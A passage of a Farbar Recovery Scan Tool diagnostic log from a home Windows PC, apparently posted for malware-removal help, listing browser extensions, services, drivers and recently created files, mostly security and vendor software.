    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)

    FireFox:
    ========
    FF DefaultProfile: y2l2kxa2.default
    FF ProfilePath: C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default [2017-02-02]
    FF Extension: (Adblock Plus) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-01]
    FF Extension: (Diagnostics) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{9ef51dc5-bd5f-423f-8914-b6fd30d03cbc}\[email protected] [2017-02-01]
    FF Extension: (Send HSTS Priming Requests) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{9ef51dc5-bd5f-423f-8914-b6fd30d03cbc}\[email protected] [2017-02-01]
    FF HKLM\...\Firefox\Extensions: [[email protected]itdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-01-19]
    FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [not signed]
    FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
    FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
    FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2016-09-05] (Citrix Systems, Inc.)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-12-28] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2015-12-22] ()
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)

    Chrome:
    =======
    CHR Plugin: (Widevine Content Decryption Module) - C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\WidevineCdm\_platform_specific\win_x64\widevinecdmadapter.dll (Google Inc.)
    CHR Plugin: (Shockwave Flash) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.194\pepflashplayer.dll ()
    CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default [2017-02-01]
    CHR Extension: (Google Docs) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-09-24]
    CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-24]
    CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-22]
    CHR Extension: (Bitdefender Wallet) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gannpgaobkkhmpomoijebaigcapoeebl [2017-02-01]
    CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-22]
    CHR Extension: (AdBlock) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
    CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-22]
    CHR Extension: (Chrome Media Router) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-04]
    CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3699904 2016-12-28] (Microsoft Corporation)
    S2 cplspcon; C:\WINDOWS\system32\IntelCpHDCPSvc.exe [431088 2016-09-25] (Intel Corporation)
    S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    R2 DevMgmtService; C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe [100448 2016-11-29] (Bitdefender)
    R2 esifsvc; C:\WINDOWS\SysWoW64\esif_uf.exe [1419424 2016-09-25] (Intel Corporation)
    R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [349728 2015-12-22] (WildTangent)
    R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [48128 2016-04-18] (HP Inc.) [File not signed]
    R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
    R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-01-11] (HP Inc.)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [19440 2015-11-04] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [356336 2016-09-25] (Intel Corporation)
    S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [976848 2016-01-14] (Intel® Corporation)
    S3 Intel® WiDi SAM; C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-09-17] (Intel Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [209184 2016-02-11] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
    S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
    R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
    R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
    R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [322560 2017-01-13] (Realtek Semiconductor)
    R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [266872 2016-08-19] (Synaptics Incorporated)
    R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-01-06] (Bitdefender)
    R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1526528 2017-02-01] (Bitdefender)
    R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
    R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
    R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
    S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
    R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
    R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
    R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [52208 2016-09-25] (Intel Corporation)
    R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [260080 2016-09-25] (Intel Corporation)
    R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
    R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
    R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [345872 2016-05-26] (Intel Corporation)
    R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [309280 2016-11-17] (Bitdefender)
    R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176064 2017-02-01] (Malwarebytes)
    R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-01] (Malwarebytes)
    R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-01] (Malwarebytes)
    R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251848 2017-02-01] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [91584 2017-02-02] (Malwarebytes)
    R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-02] (Malwarebytes)
    S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
    U5 Netwtw02; C:\Windows\System32\Drivers\Netwtw02.sys [6724368 2016-02-06] (Intel Corporation)
    R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
    R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [935168 2016-01-19] (Realtek                                            )
    S3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [769752 2016-01-20] (Realsil Semiconductor Corporation)
    S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [413912 2016-01-20] (Realsil Semiconductor Corporation)
    S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [58984 2016-02-22] (Synaptics Incorporated)
    R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [72824 2016-08-19] (Synaptics Incorporated)
    R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
    S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
    S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
    S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
    R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31656 2016-04-14] (HP)
    U0 aswVmm; no ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-02-01 21:13 - 2017-02-01 21:16 - 00002795 _____ C:\Users\Joseph\Downloads\Fixlog.txt
    2017-02-01 21:11 - 2017-02-01 21:13 - 00000000 ____D C:\Users\Joseph\Documents\FRST911
    2017-02-01 20:30 - 2017-02-02 10:14 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Mozilla
    2017-02-01 20:29 - 2017-02-01 20:36 - 00000000 ____D C:\Users\Joseph\AppData\Local\Mozilla
    2017-02-01 20:29 - 2017-02-01 20:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Mozilla
    2017-02-01 20:28 - 2017-02-01 20:28 - 00001239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-02-01 20:28 - 2017-02-01 20:28 - 00001227 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2017-02-01 20:26 - 2017-02-01 20:27 - 00245424 _____ C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe
    2017-02-01 18:24 - 2017-02-01 18:25 - 55566792 _____ (Malwarebytes ) C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe
    2017-02-01 17:47 - 2017-02-01 21:33 - 00037463 _____ C:\Users\Joseph\Downloads\Addition.txt
    2017-02-01 17:45 - 2017-02-02 12:02 - 00024572 _____ C:\Users\Joseph\Downloads\FRST.txt
    2017-02-01 17:45 - 2017-02-02 12:02 - 00000000 ____D C:\FRST
    2017-02-01 17:43 - 2017-02-01 17:45 - 02420736 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
    2017-02-01 17:20 - 2017-02-01 17:27 - 00000556 _____ C:\Users\Joseph\Desktop\JRT.txt
    2017-02-01 17:07 - 2017-02-01 21:17 - 00002361 _____ C:\bdlog.txt
    2017-02-01 17:02 - 2017-02-01 18:10 - 00000000 ____D C:\AdwCleaner
    2017-02-01 16:58 - 2017-02-01 17:15 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT (1).exe
    2017-02-01 16:56 - 2017-02-01 16:58 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT.exe
    2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ C:\Users\Joseph\Downloads\AdwCleaner.exe
    2017-02-01 16:52 - 2017-02-01 16:52 - 00040137 _____ C:\ProgramData\dm.1485985887.bdinstall.bin
    2017-02-01 09:33 - 2017-02-01 09:33 - 00000385 _____ C:\WINDOWS\system32\user_gensett.xml
    2017-02-01 08:54 - 2017-02-01 08:54 - 00000000 ____D C:\Users\Joseph\AppData\Temp
    2017-02-01 08:52 - 2017-02-01 08:52 - 00056949 _____ C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 08:51 - 2017-02-01 08:51 - 00000000 ____D C:\ProgramData\Bitdefender Device Management
    2017-02-01 08:47 - 2017-02-01 18:34 - 00003406 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
    2017-02-01 08:47 - 2017-02-01 08:47 - 00403991 _____ C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:45 - 2017-02-01 08:45 - 00002310 _____ C:\Users\Public\Desktop\Bitdefender 2017.lnk
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\BDLogging
    2017-02-01 08:44 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
    2017-02-01 08:44 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
    2017-02-01 08:44 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
    2017-02-01 08:44 - 2015-12-04 19:27 - 00087912 _____ (BitDefender) C:\WINDOWS\system32\Drivers\bdvedisk.sys
    2017-02-01 08:44 - 2007-04-11 11:11 - 00511328 _____ (Microsoft Corporation) C:\WINDOWS\capicom.dll
    2017-02-01 08:43 - 2017-02-01 08:51 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Bitdefender
    2017-02-01 08:43 - 2016-11-17 05:00 - 00309280 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\ignis.sys
    2017-02-01 08:38 - 2017-02-01 18:34 - 00000000 ____D C:\ProgramData\Bitdefender
    2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\Program Files\Bitdefender
    2017-02-01 08:38 - 2016-10-29 08:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
    2017-02-01 08:38 - 2016-06-22 14:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
    2017-02-01 08:37 - 2017-02-01 08:38 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
    2017-02-01 08:37 - 2017-02-01 08:37 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\QuickScan
    2017-02-01 08:29 - 2017-02-01 08:29 - 00003794 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
    2017-02-01 08:27 - 2017-02-02 12:05 - 00000000 ____D C:\Program Files\Bitdefender Agent
    2017-02-01 08:27 - 2017-02-01 08:27 - 00047353 _____ C:\ProgramData\agent.1485955633.bdinstall.bin
    2017-02-01 08:27 - 2017-02-01 08:27 - 00000000 ____D C:\ProgramData\Bitdefender Agent
    2017-02-01 08:26 - 2017-02-01 08:27 - 11842648 _____ C:\Users\Joseph\Downloads\bitdefender_windows_43ea11d5-575e-4d5e-84a9-5683192df898.exe
    2017-01-31 23:27 - 2017-01-31 23:27 - 00000017 _____ C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-01-31 23:13 - 2017-01-31 23:13 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\132034FB.sys
    2017-01-31 15:37 - 2017-01-31 15:37 - 01923396 _____ C:\Users\Joseph\Downloads\hospital visit.pdf
    2017-01-30 20:58 - 2017-01-30 20:59 - 02059056 _____ (The Nielsen Company) C:\Users\Joseph\Downloads\ShopTracker_033D6D4A68A315B4A000 (2).exe
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\Program Files\Common Files\AV
    2017-01-25 00:02 - 2016-12-21 02:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
    2017-01-25 00:02 - 2016-12-20 23:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
    2017-01-24 23:47 - 2017-01-21 21:14 - 00485032 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
    2017-01-24 17:47 - 2017-01-24 17:47 - 10697014 _____ C:\Users\Joseph\Downloads\FDN_Glyphosate_FoodTesting_Report_p2016.pdf
    2017-01-24 13:33 - 2017-01-24 13:33 - 00083650 _____ C:\Users\Joseph\Downloads\visit 1-23.pdf
    2017-01-21 13:55 - 2017-02-01 08:34 - 00000000 ____D C:\ProgramData\AVAST Software
    2017-01-21 13:55 - 2017-01-21 13:55 - 06253640 _____ (AVAST Software) C:\Users\Joseph\Downloads\avast_free_antivirus_setup_online_cnet_2.exe
    2017-01-19 21:09 - 2017-01-19 21:09 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill (2).pdf
    2017-01-19 21:09 - 2017-01-19 21:09 - 00150985 _____ C:\Users\Joseph\Downloads\PDF_Bill (3).pdf
    2017-01-19 21:08 - 2017-01-19 21:08 - 00199440 _____ C:\Users\Joseph\Downloads\PDF_Bill (1).pdf
    2017-01-19 21:06 - 2017-01-19 21:06 - 00001115 _____ C:\Users\Joseph\Downloads\AccountEnergyUsage.csv
    2017-01-19 20:26 - 2017-01-19 20:26 - 00223944 _____ C:\Users\Joseph\Downloads\djcxMjYtODA5MC04MDkxLTgzNjMtT0lCMS00MDRGQUFCQi0wLTIyMzk0NC00Nzk2ODE3LTIyMzk0NC04NS02OC0wLTE2OS0wLV4BUAExNzA5NgEyMzYxNAE0AUNCQwFDQkMwMQEyMDA0LTAwMDEBQUNDRVNTIE5BVElPTkFMIENPUlBPUkFUSU9OIFBST0ZJVCBTSEFSSU5HIFBMQU4BTkEBUk.pdf
    2017-01-19 14:36 - 2017-01-19 14:36 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Temp
    2017-01-18 22:07 - 2017-01-18 22:07 - 00676419 _____ C:\Users\Joseph\Downloads\137230-201711873115438.pdf
    2017-01-15 18:00 - 2017-01-15 18:00 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill.pdf
    2017-01-15 16:33 - 2017-01-15 16:33 - 00086004 _____ C:\Users\Joseph\Downloads\DS82_Complete (1).pdf
    2017-01-15 16:15 - 2017-01-15 16:15 - 00683112 _____ C:\Users\Joseph\Downloads\taxReturn (1).tax2016
    2017-01-15 16:11 - 2017-01-15 16:24 - 01487502 _____ C:\Users\Joseph\Downloads\taxReturn.tax2016
    2017-01-15 15:50 - 2017-01-15 15:50 - 06281998 _____ C:\Users\Joseph\Downloads\C2 Artist Mini-Posters.pdf
    2017-01-15 15:44 - 2017-01-15 15:44 - 00002529 _____ C:\Users\Public\Desktop\TurboTax 2016.lnk
    2017-01-15 15:44 - 2017-01-15 15:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2016
    2017-01-15 15:29 - 2017-01-15 15:30 - 121060464 _____ C:\Users\Joseph\Downloads\turbotax_deluxe_2016_windows.exe
    2017-01-14 21:56 - 2017-01-14 21:56 - 00085948 _____ C:\Users\Joseph\Downloads\DS82_Complete.pdf
    2017-01-14 11:22 - 2017-01-14 11:22 - 00235450 _____ C:\Users\Joseph\Downloads\CAMP_CONNECTION_CARNIVAL_flier2106.pdf
    2017-01-13 15:55 - 2017-01-13 15:53 - 72520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
    2017-01-13 15:55 - 2017-01-13 15:53 - 07704619 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
    2017-01-13 15:55 - 2017-01-13 15:53 - 03204096 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 03014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
    2017-01-13 15:55 - 2017-01-13 15:53 - 02706856 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 02201088 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01615656 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01529136 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64Proxy.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01435136 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
